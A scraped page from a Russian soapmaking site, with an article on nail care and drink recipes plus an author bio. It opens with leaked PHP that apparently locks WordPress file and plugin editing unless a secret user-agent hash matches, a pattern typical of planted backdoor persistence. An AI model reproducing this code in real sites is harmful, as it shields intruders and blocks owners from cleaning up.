if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Уход за ногтями | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Раскрываем секреты по правильному уходу за ногтями

Очень часто женская работа наносит вред ноготкам и портит их вид. Чтобы это исправить, необходимо просто правильно за ними ухаживать

Очень часто жен­ская рабо­та нано­сит вред ногот­кам и пор­тит их вид. Что­бы это испра­вить, необ­хо­ди­мо про­сто пра­виль­но за ними уха­жи­вать. Если ног­ти здо­ро­вы, то они креп­кие, глад­кие, име­ют розо­ва­тый отте­нок и не слоятся.фото молочный коктейль

Здо­ро­вье ног­тей напря­мую зави­сит от того, что мы едим, поэто­му ниже пред­став­лен спи­сок напит­ков, кото­рые поло­жи­тель­но вли­я­ют на здо­ро­вье ног­тей. Эти напит­ки явля­ют­ся источ­ни­ка­ми вита­ми­нов и мик­ро­эле­мен­тов, необ­хо­ди­мых для здо­ро­во­го роста ногтей

  1. Напи­ток из рав­но­го коли­че­ства гру­ше­во­го сока и хлеб­но­го ква­са, для улуч­ше­ния вку­са, мож­но доба­вить мед.
  2. Молоч­ный кок­тейль с апель­си­но­вым соком. Для его при­го­тов­ле­ния необ­хо­ди­мо сме­шать сок апель­си­на, моло­ко (10 мл), яблоч­ный сок (2 ст. л.), отру­би (2 ст. л.), имбирь (0,5 ч. л.).
  3. А мож­но исполь­зо­вать кок­тейль из сока грейп­фру­та и молоч­ной сыво­рот­ки (100 мл). в эту смесь сле­ду­ет доба­вить 1 ст. л. меда и 2 ст. л . отрубей.

А еще за ног­тя­ми необ­хо­ди­мо пра­виль­но уха­жи­вать. Для это­го исполь­зу­ют спе­ци­аль­ные мани­кюр­ные инстру­мен­ты, кото­рые явля­ют­ся инди­ви­ду­аль­ны­ми и у каж­до­го они долж­ны быть свои. Если же пред­сто­ят рабо­ты с зем­лей, то сле­ду­ет про­скре­сти ноко­точ­ка­ми по кусоч­ку с мылом. Потом мыло лег­ко вымы­ва­ет­ся вме­сте с гря­зью, а ног­ти оста­ют­ся чистыми.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!